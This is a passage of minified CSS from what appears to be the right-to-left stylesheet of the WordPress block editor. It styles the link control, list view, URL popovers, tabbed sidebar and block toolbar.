16px}.block-editor-link-control__search-results-wrapper{position:relative}.block-editor-link-control__search-results-wrapper:after,.block-editor-link-control__search-results-wrapper:before{content:"";display:block;left:16px;pointer-events:none;position:absolute;right:-1px;z-index:100}.block-editor-link-control__search-results-wrapper:before{bottom:auto;height:8px;top:0}.block-editor-link-control__search-results-wrapper:after{bottom:0;height:16px;top:auto}.block-editor-link-control__search-results{margin-top:-16px;max-height:200px;overflow-y:auto;padding:8px}.block-editor-link-control__search-results.is-loading{opacity:.2}.block-editor-link-control__search-item.components-button.components-menu-item__button{height:auto;text-align:right}.block-editor-link-control__search-item .components-menu-item__item{display:inline-block;overflow:hidden;text-overflow:ellipsis;width:100%}.block-editor-link-control__search-item .components-menu-item__item mark{background-color:initial;color:inherit;font-weight:600}.block-editor-link-control__search-item .components-menu-item__shortcut{color:#757575;white-space:nowrap}.block-editor-link-control__search-item[aria-selected]{background:#f0f0f0}.block-editor-link-control__search-item.is-current{background:#0000;border:0;cursor:default;flex-direction:column;padding:16px;width:100%}.block-editor-link-control__search-item .block-editor-link-control__search-item-header{align-items:center;display:block;flex-direction:row;gap:8px;margin-left:8px;overflow-wrap:break-word;white-space:pre-wrap}.block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-info{color:#757575;font-size:12px;line-height:1.1;word-break:break-all}.block-editor-link-control__search-item.is-preview .block-editor-link-control__search-item-header{display:flex;flex:1}.block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-header{align-items:center}.block-editor-link-control__search-item.is-url-title .block-editor-link-control__search-item-title{word-break:break-all}.block-editor-link-control__search-item .block-editor-link-control__search-item-details{display:flex;flex-direction:column;gap:4px;justify-content:space-between}.block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-icon{background-color:#f0f0f0;border-radius:2px;height:32px;width:32px}.block-editor-link-control__search-item .block-editor-link-control__search-item-icon{align-items:center;display:flex;flex-shrink:0;justify-content:center;position:relative}.block-editor-link-control__search-item .block-editor-link-control__search-item-icon img{width:16px}.block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-icon{max-height:32px;top:0;width:32px}.block-editor-link-control__search-item .block-editor-link-control__search-item-title{line-height:1.1}.block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus{box-shadow:none}.block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus-visible{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000;text-decoration:none}.block-editor-link-control__search-item .block-editor-link-control__search-item-title mark{background-color:initial;color:inherit;font-weight:600}.block-editor-link-control__search-item .block-editor-link-control__search-item-title span{font-weight:400}.block-editor-link-control__search-item .block-editor-link-control__search-item-title .components-external-link__icon{height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;clip:rect(0,0,0,0);border:0}.block-editor-link-control__search-item-top{align-items:center;display:flex;flex-direction:row;width:100%}.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon img,.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon svg{opacity:0}.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{background-color:#f0f0f0;border-radius:100%;bottom:0;content:"";display:block;left:0;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{animation:loadingpulse 1s linear infinite;animation-delay:.5s}}.block-editor-link-control__loading{align-items:center;display:flex;margin:16px}.block-editor-link-control__loading .components-spinner{margin-top:0}.components-button+.block-editor-link-control__search-create{overflow:visible;padding:12px 16px}.components-button+.block-editor-link-control__search-create:before{content:"";display:block;position:absolute;right:0;top:-10px;width:100%}.block-editor-link-control__search-create{align-items:center}.block-editor-link-control__search-create .block-editor-link-control__search-item-title{margin-bottom:0}.block-editor-link-control__search-create .block-editor-link-control__search-item-icon{top:0}.block-editor-link-control__drawer-inner{display:flex;flex-basis:100%;flex-direction:column;position:relative}.block-editor-link-control__settings{border:0;margin:0;padding:0}.block-editor-link-control__setting{flex:1;margin-bottom:0;padding:8px 24px}.block-editor-link-control__setting .components-base-control:not(.components-input-control) .components-base-control__field{display:flex}.block-editor-link-control__setting .components-base-control__field .components-checkbox-control__label{color:#1e1e1e}.block-editor-link-control__setting input{margin-right:0}.is-preview .block-editor-link-control__setting{padding:20px 0 8px 8px}.block-editor-link-control__tools{margin-top:-16px;padding:8px 8px 0}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle{gap:0;padding-right:0}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true]{color:#1e1e1e}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{visibility:visible}@media not (prefers-reduced-motion){.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{transition:transform .1s ease}}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{transform:rotate(-90deg)}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{transform:rotate(0deg);visibility:visible}@media not (prefers-reduced-motion){.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{transition:transform .1s ease}}.block-editor-link-control .block-editor-link-control__search-input .components-spinner{display:block}.block-editor-link-control .block-editor-link-control__search-input .components-spinner.components-spinner{bottom:auto;left:40px;position:absolute;right:auto;top:calc(50% - 8px)}.block-editor-link-control .block-editor-link-control__search-input-wrapper.has-actions .components-spinner{left:12px;top:calc(50% + 4px)}.block-editor-list-view-tree{border-collapse:collapse;margin:0;padding:0;width:100%}.components-modal__content .block-editor-list-view-tree{margin:-12px -6px 0;width:calc(100% + 12px)}.block-editor-list-view-tree.is-dragging tbody{pointer-events:none}.block-editor-list-view-leaf{position:relative;transform:translateY(0)}.block-editor-list-view-leaf.is-draggable,.block-editor-list-view-leaf.is-draggable .block-editor-list-view-block-contents{cursor:grab}.block-editor-list-view-leaf .block-editor-list-view-block-select-button[aria-expanded=true]{color:inherit}.block-editor-list-view-leaf .block-editor-list-view-block-select-button:hover{color:var(--wp-admin-theme-color)}.block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{fill:currentColor}@media (forced-colors:active){.block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{fill:CanvasText}}.is-dragging-components-draggable .block-editor-list-view-leaf:not(.is-selected) .block-editor-list-view-block-select-button:hover{color:inherit}.block-editor-list-view-leaf.is-selected td{background:var(--wp-admin-theme-color)}.block-editor-list-view-leaf.is-selected.is-synced td{background:var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents .block-editor-block-icon,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:hover{color:var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents,.block-editor-list-view-leaf.is-selected .components-button.has-icon{color:#fff}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents:focus:after{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-list-view-leaf.is-selected.is-synced .block-editor-list-view-block-contents:focus:after{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block__menu:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff}.block-editor-list-view-leaf.is-first-selected td:first-child{border-top-right-radius:2px}.block-editor-list-view-leaf.is-first-selected td:last-child{border-top-left-radius:2px}.block-editor-list-view-leaf.is-last-selected td:first-child{border-bottom-right-radius:2px}.block-editor-list-view-leaf.is-last-selected td:last-child{border-bottom-left-radius:2px}.block-editor-list-view-leaf.is-branch-selected:not(.is-selected):not(.is-synced-branch){background:rgba(var(--wp-admin-theme-color--rgb),.04)}.block-editor-list-view-leaf.is-synced-branch.is-branch-selected{background:rgba(var(--wp-block-synced-color--rgb),.04)}.block-editor-list-view-leaf.is-branch-selected.is-first-selected td:first-child{border-top-right-radius:2px}.block-editor-list-view-leaf.is-branch-selected.is-first-selected td:last-child{border-top-left-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:first-child{border-top-right-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:last-child{border-top-left-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:first-child{border-bottom-right-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:last-child{border-bottom-left-radius:2px}.block-editor-list-view-leaf.is-branch-selected:not(.is-selected) td{border-radius:0}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-displacement-normal{transition:transform .2s}}.block-editor-list-view-leaf.is-displacement-normal{transform:translateY(0)}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-displacement-up{transition:transform .2s}}.block-editor-list-view-leaf.is-displacement-up{transform:translateY(-32px)}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-displacement-down{transition:transform .2s}}.block-editor-list-view-leaf.is-displacement-down{transform:translateY(32px)}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-after-dragged-blocks{transition:transform .2s}}.block-editor-list-view-leaf.is-after-dragged-blocks{transform:translateY(calc(var(--wp-admin--list-view-dragged-items-height, 32px)*-1))}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{transition:transform .2s}}.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{transform:translateY(calc(-32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1))}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{transition:transform .2s}}.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{transform:translateY(calc(32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1))}.block-editor-list-view-leaf.is-dragging{opacity:0;pointer-events:none;right:0;z-index:-9999}.block-editor-list-view-leaf .block-editor-list-view-block-contents{align-items:center;border-radius:2px;box-sizing:border-box;color:inherit;display:flex;font-family:inherit;font-size:13px;font-weight:400;height:32px;margin:0;padding:6px 0 6px 4px;position:relative;text-align:right;text-decoration:none;white-space:nowrap;width:100%}@media not (prefers-reduced-motion){.block-editor-list-view-leaf .block-editor-list-view-block-contents{transition:box-shadow .1s linear}}.components-modal__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{padding-left:0;padding-right:0}.block-editor-list-view-leaf .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents{box-shadow:none}.block-editor-list-view-leaf .block-editor-list-view-block-contents:focus:after,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents:after{border-radius:inherit;bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";left:-29px;pointer-events:none;position:absolute;right:0;top:0;z-index:2}.block-editor-list-view-leaf.has-single-cell .block-editor-list-view-block-contents:focus:after{left:0}.block-editor-list-view-leaf .block-editor-list-view-block__menu:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view__menu{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);z-index:1}.block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{opacity:1}@keyframes __wp-base-styles-fade-in{0%{opacity:0}to{opacity:1}}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{animation:__wp-base-styles-fade-in .08s linear 0s;animation-fill-mode:forwards}}.block-editor-list-view-leaf .block-editor-block-icon{flex:0 0 24px;margin-left:4px}.block-editor-list-view-leaf .block-editor-list-view-block__contents-cell,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{padding:0}.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{line-height:0;vertical-align:middle;width:28px}.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell>*{opacity:0}.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:hover>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:hover>*{opacity:1}.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell-alignment-wrapper{align-items:center;display:flex;flex-direction:column;height:100%}.block-editor-list-view-leaf .block-editor-block-mover-button{height:24px;position:relative;width:36px}.block-editor-list-view-leaf .block-editor-block-mover-button svg{height:24px;position:relative}.block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button{align-items:flex-end;margin-top:-6px}.block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button svg{bottom:-4px}.block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button{align-items:flex-start;margin-bottom:-6px}.block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button svg{top:-4px}.block-editor-list-view-leaf .block-editor-block-mover-button:before{height:16px;left:0;min-width:100%;right:0}.block-editor-list-view-leaf .block-editor-inserter__toggle{background:#1e1e1e;color:#fff;height:24px;margin:6px 1px 6px 6px;min-width:24px}.block-editor-list-view-leaf .block-editor-inserter__toggle:active{color:#fff}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__label-wrapper svg{position:relative;right:2px}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__title{flex:1;position:relative}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__title .components-truncate{position:absolute;transform:translateY(-50%);width:100%}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor-wrapper{max-width:min(110px,40%);position:relative;width:100%}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor{left:0;position:absolute;transform:translateY(-50%)}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__anchor{background:#0000004d;color:#fff}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__block-visibility,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__lock,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__sticky{line-height:0}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__images{display:flex}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__image{background-size:cover;border-radius:1px;height:18px;width:18px}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:only-child){box-shadow:0 0 0 2px #fff}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:first-child){margin-right:-6px}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__image:not(:only-child){box-shadow:0 0 0 2px var(--wp-admin-theme-color)}.block-editor-list-view-draggable-chip{opacity:.8}.block-editor-list-view-appender__cell .block-editor-list-view-appender__container,.block-editor-list-view-appender__cell .block-editor-list-view-block__contents-container,.block-editor-list-view-block__contents-cell .block-editor-list-view-appender__container,.block-editor-list-view-block__contents-cell .block-editor-list-view-block__contents-container{display:flex}.block-editor-list-view__expander{cursor:pointer;height:24px;width:24px}.block-editor-list-view-leaf[aria-level] .block-editor-list-view__expander{margin-right:192px}.block-editor-list-view-leaf[aria-level="1"] .block-editor-list-view__expander{margin-right:0}.block-editor-list-view-leaf[aria-level="2"] .block-editor-list-view__expander{margin-right:24px}.block-editor-list-view-leaf[aria-level="3"] .block-editor-list-view__expander{margin-right:48px}.block-editor-list-view-leaf[aria-level="4"] .block-editor-list-view__expander{margin-right:72px}.block-editor-list-view-leaf[aria-level="5"] .block-editor-list-view__expander{margin-right:96px}.block-editor-list-view-leaf[aria-level="6"] .block-editor-list-view__expander{margin-right:120px}.block-editor-list-view-leaf[aria-level="7"] .block-editor-list-view__expander{margin-right:144px}.block-editor-list-view-leaf[aria-level="8"] .block-editor-list-view__expander{margin-right:168px}.block-editor-list-view-leaf .block-editor-list-view__expander{visibility:hidden}.block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{visibility:visible}@media not (prefers-reduced-motion){.block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{transition:transform .2s ease}}.block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{transform:rotate(-90deg)}.block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{transform:rotate(0deg);visibility:visible}@media not (prefers-reduced-motion){.block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{transition:transform .2s ease}}.block-editor-list-view-drop-indicator{pointer-events:none}.block-editor-list-view-drop-indicator .block-editor-list-view-drop-indicator__line{background:var(--wp-admin-theme-color);border-radius:4px;height:4px}.block-editor-list-view-drop-indicator--preview{pointer-events:none}.block-editor-list-view-drop-indicator--preview .components-popover__content{overflow:hidden!important}.block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-radius:4px;height:32px;overflow:hidden}.block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line--darker{background:rgba(var(--wp-admin-theme-color--rgb),.09)}.block-editor-list-view-placeholder{height:32px;margin:0;padding:0}.list-view-appender .block-editor-inserter__toggle{background-color:#1e1e1e;color:#fff;height:24px;margin:8px 24px 0 0;padding:0}.list-view-appender .block-editor-inserter__toggle.has-icon.is-next-40px-default-size{min-width:24px}.list-view-appender .block-editor-inserter__toggle:focus,.list-view-appender .block-editor-inserter__toggle:hover{background:var(--wp-admin-theme-color);color:#fff}.list-view-appender__description{display:none}.block-editor-media-placeholder__url-input-form{min-width:260px}@media (min-width:600px){.block-editor-media-placeholder__url-input-form{width:300px}}.block-editor-media-placeholder__url-input-form input{direction:ltr}.modal-open .block-editor-media-replace-flow__options{display:none}.block-editor-media-replace-flow__indicator{margin-right:4px}.block-editor-media-replace-flow__media-upload-menu:not(:empty)+.block-editor-media-flow__url-input{border-top:1px solid #1e1e1e;margin-top:8px;padding-bottom:8px}.block-editor-media-flow__url-input{margin-left:-8px;margin-right:-8px;padding:16px}.block-editor-media-flow__url-input .block-editor-media-replace-flow__image-url-label{display:block;margin-bottom:8px;top:16px}.block-editor-media-flow__url-input .block-editor-link-control{width:300px}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-url-input{margin:0;padding:0}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__tools{justify-content:flex-end;padding:16px var(--wp-admin-border-width-focus) var(--wp-admin-border-width-focus)}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-item.is-current{padding:0;width:auto}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-input.block-editor-link-control__search-input input[type=text]{margin:0;width:100%}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-actions{padding:8px 0 0}.block-editor-media-flow__error{max-width:255px;padding:0 20px 20px}.block-editor-media-flow__error .components-with-notices-ui{max-width:255px}.block-editor-media-flow__error .components-with-notices-ui .components-notice__content{overflow:hidden;word-wrap:break-word}.block-editor-media-flow__error .components-with-notices-ui .components-notice__dismiss{left:10px;position:absolute}.block-editor-multi-selection-inspector__card{padding:16px}.block-editor-multi-selection-inspector__card-title{font-weight:500}.block-editor-multi-selection-inspector__card .block-editor-block-icon{height:24px;margin-right:-2px;padding:0 3px;width:36px}.block-editor-responsive-block-control{border-bottom:1px solid #ccc;margin-bottom:28px;padding-bottom:14px}.block-editor-responsive-block-control:last-child{border-bottom:0;padding-bottom:0}.block-editor-responsive-block-control__title{margin:0 -3px .6em 0}.block-editor-responsive-block-control__label{font-weight:600;margin-bottom:.6em;margin-right:-3px}.block-editor-responsive-block-control__inner{margin-right:-1px}.block-editor-responsive-block-control__toggle{margin-right:1px}.block-editor-responsive-block-control .components-base-control__help{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.components-popover.block-editor-rich-text__inline-format-toolbar{z-index:99998}.components-popover.block-editor-rich-text__inline-format-toolbar .components-popover__content{border-radius:2px;box-shadow:none;margin-bottom:8px;min-width:auto;outline:none;width:auto}.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar{border-radius:2px}.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar-group{background:none}.components-popover.block-editor-rich-text__inline-format-toolbar .components-dropdown-menu__toggle,.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar__control{min-height:48px;min-width:48px;padding-left:12px;padding-right:12px}.block-editor-rich-text__inline-format-toolbar-group .components-dropdown-menu__toggle{justify-content:center}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon{width:auto}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon svg{display:none}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon:after{content:attr(aria-label)}.block-editor-skip-to-selected-block{position:absolute;top:-9999em}.block-editor-skip-to-selected-block:focus{background:#f1f1f1;font-size:14px;font-weight:600;z-index:100000}.block-editor-tabbed-sidebar{background-color:#fff;display:flex;flex-direction:column;flex-grow:1;height:100%;overflow:hidden}.block-editor-tabbed-sidebar__tablist-and-close-button{border-bottom:1px solid #ddd;display:flex;justify-content:space-between;padding-left:8px}.block-editor-tabbed-sidebar__close-button{align-self:center;background:#fff;order:1}.block-editor-tabbed-sidebar__tablist{margin-bottom:-1px}.block-editor-tabbed-sidebar__tabpanel{display:flex;flex-direction:column;flex-grow:1;overflow-y:auto;scrollbar-gutter:auto}.block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{flex-grow:1;padding:1px;position:relative}@media (min-width:600px){.block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{min-width:300px;width:auto}}.block-editor-block-list__block .block-editor-url-input.is-full-width,.block-editor-block-list__block .block-editor-url-input.is-full-width__suggestions,.block-editor-url-input.is-full-width,.block-editor-url-input.is-full-width__suggestions,.components-popover .block-editor-url-input.is-full-width,.components-popover .block-editor-url-input.is-full-width__suggestions{width:100%}.block-editor-block-list__block .block-editor-url-input .components-spinner,.block-editor-url-input .components-spinner,.components-popover .block-editor-url-input .components-spinner{left:8px;margin:0;position:absolute;top:calc(50% - 8px)}.block-editor-url-input__suggestions{max-height:200px}@media not (prefers-reduced-motion){.block-editor-url-input__suggestions{transition:all .15s ease-in-out}}.block-editor-url-input__suggestions{overflow-y:auto;padding:4px 0;width:302px}.block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{display:none}@media (min-width:600px){.block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{display:grid}}.block-editor-url-input__suggestion{background:#fff;border:none;box-shadow:none;color:#757575;cursor:pointer;display:block;font-size:13px;height:auto;min-height:36px;text-align:right;width:100%}.block-editor-url-input__suggestion:hover{background:#ddd}.block-editor-url-input__suggestion.is-selected,.block-editor-url-input__suggestion:focus{background:var(--wp-admin-theme-color-darker-20);color:#fff;outline:none}.components-toolbar-group>.block-editor-url-input__button,.components-toolbar>.block-editor-url-input__button{position:inherit}.block-editor-url-input__button .block-editor-url-input__back{margin-left:4px;overflow:visible}.block-editor-url-input__button .block-editor-url-input__back:after{background:#ddd;content:"";display:block;height:24px;left:-1px;position:absolute;width:1px}.block-editor-url-input__button-modal{background:#fff;border:1px solid #ddd;box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003}.block-editor-url-input__button-modal-line{align-items:flex-start;display:flex;flex-direction:row;flex-grow:1;flex-shrink:1;min-width:0}.block-editor-url-popover__additional-controls{border-top:1px solid #1e1e1e;padding:8px}.block-editor-url-popover__input-container{padding:8px}.block-editor-url-popover__row{align-items:center;display:flex;gap:4px}.block-editor-url-popover__row>:not(.block-editor-url-popover__settings-toggle){flex-grow:1;gap:8px}.block-editor-url-popover__additional-controls .components-button.has-icon{height:auto;padding-left:8px;padding-right:8px;text-align:right}.block-editor-url-popover__additional-controls .components-button.has-icon>svg{margin-left:8px}.block-editor-url-popover__settings-toggle{flex-shrink:0}.block-editor-url-popover__settings-toggle[aria-expanded=true] .dashicon{transform:rotate(-180deg)}.block-editor-url-popover__settings{border-top:1px solid #1e1e1e;display:block;padding:16px}.block-editor-url-popover__link-editor,.block-editor-url-popover__link-viewer{display:flex}.block-editor-url-popover__link-viewer-url{align-items:center;display:flex;flex-grow:1;flex-shrink:1;margin-left:8px;max-width:350px;min-width:150px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.block-editor-url-popover__link-viewer-url.has-invalid-link{color:#cc1818}.block-editor-url-popover__expand-on-click{align-items:center;display:flex;min-width:350px;white-space:nowrap}.block-editor-url-popover__expand-on-click .text{flex-grow:1}.block-editor-url-popover__expand-on-click .text p{line-height:16px;margin:0}.block-editor-url-popover__expand-on-click .text p.description{color:#757575;font-size:12px}.block-editor-hooks__block-hooks .components-toggle-control .components-h-stack .components-h-stack{flex-direction:row}.block-editor-hooks__block-hooks .block-editor-hooks__block-hooks-helptext{color:#757575;font-size:12px;margin-bottom:16px}div.block-editor-bindings__panel{grid-template-columns:repeat(auto-fit,minmax(100%,1fr))}div.block-editor-bindings__panel button:hover .block-editor-bindings__item span{color:inherit}.border-block-support-panel .single-column{grid-column:span 1}.color-block-support-panel .block-editor-contrast-checker{grid-column:span 2;margin-top:16px}.color-block-support-panel .block-editor-contrast-checker .components-notice__content{margin-left:0}.color-block-support-panel.color-block-support-panel .color-block-support-panel__inner-wrapper{row-gap:0}.color-block-support-panel .block-editor-tools-panel-color-gradient-settings__item.first{margin-top:0}.dimensions-block-support-panel .single-column{grid-column:span 1}.block-editor-hooks__layout-constrained .components-base-control{margin-bottom:0}.block-editor-hooks__layout-constrained-helptext{color:#757575;font-size:12px;margin-bottom:0}.block-editor-hooks__flex-layout-justification-controls,.block-editor-hooks__flex-layout-orientation-controls{margin-bottom:12px}.block-editor-hooks__flex-layout-justification-controls legend,.block-editor-hooks__flex-layout-orientation-controls legend{margin-bottom:8px}.block-editor-hooks__grid-layout-columns-and-rows-controls,.block-editor-hooks__grid-layout-minimum-width-control{border:0;margin:0;padding:0}.block-editor__spacing-visualizer{border-color:var(--wp-admin-theme-color);border-style:solid;bottom:0;box-sizing:border-box;left:0;opacity:.5;pointer-events:none;position:absolute;right:0;top:0}.typography-block-support-panel .single-column{grid-column:span 1}.block-editor-block-toolbar{display:flex;flex-grow:1;overflow-x:auto;overflow-y:hidden;position:relative;width:100%}@media not (prefers-reduced-motion){.block-editor-block-toolbar{transition:border-color .1s linear,box-shadow .1s linear}}@media (min-width:600px){.block-editor-block-toolbar{overflow:inherit}}.block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group{background:none;border:0;border-left:1px solid #ddd;margin-bottom:-1px;margin-top:-1px}.block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button:before{background:color-mix(in srgb,var(--wp-block-synced-color) 10%,#0000);border-radius:2px}.block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-connected .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon{color:var(--wp-block-synced-color)}.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2),.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar,.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar-group,.block-editor-block-toolbar>:last-child,.block-editor-block-toolbar>:last-child .components-toolbar,.block-editor-block-toolbar>:last-child .components-toolbar-group{border-left:none}.block-editor-block-toolbar .components-toolbar-group:empty{display:none}.block-editor-block-contextual-toolbar{background-color:#fff;display:block;flex-shrink:3;position:sticky;top:0;width:100%;z-index:31}.block-editor-block-contextual-toolbar.components-accessible-toolbar{border:none;border-radius:0}.block-editor-block-contextual-toolbar.is-unstyled{box-shadow:0 1px 0 0 rgba(0,0,0,.133)}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{overflow:auto;overflow-y:hidden}.block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar{height:12px;width:12px}.block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-track{background-color:initial}.block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:#e0e0e0;border:3px solid #0000;border-radius:8px}.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover::-webkit-scrollbar-thumb{background-color:#949494}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{scrollbar-color:#e0e0e0 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.block-editor-block-contextual-toolbar 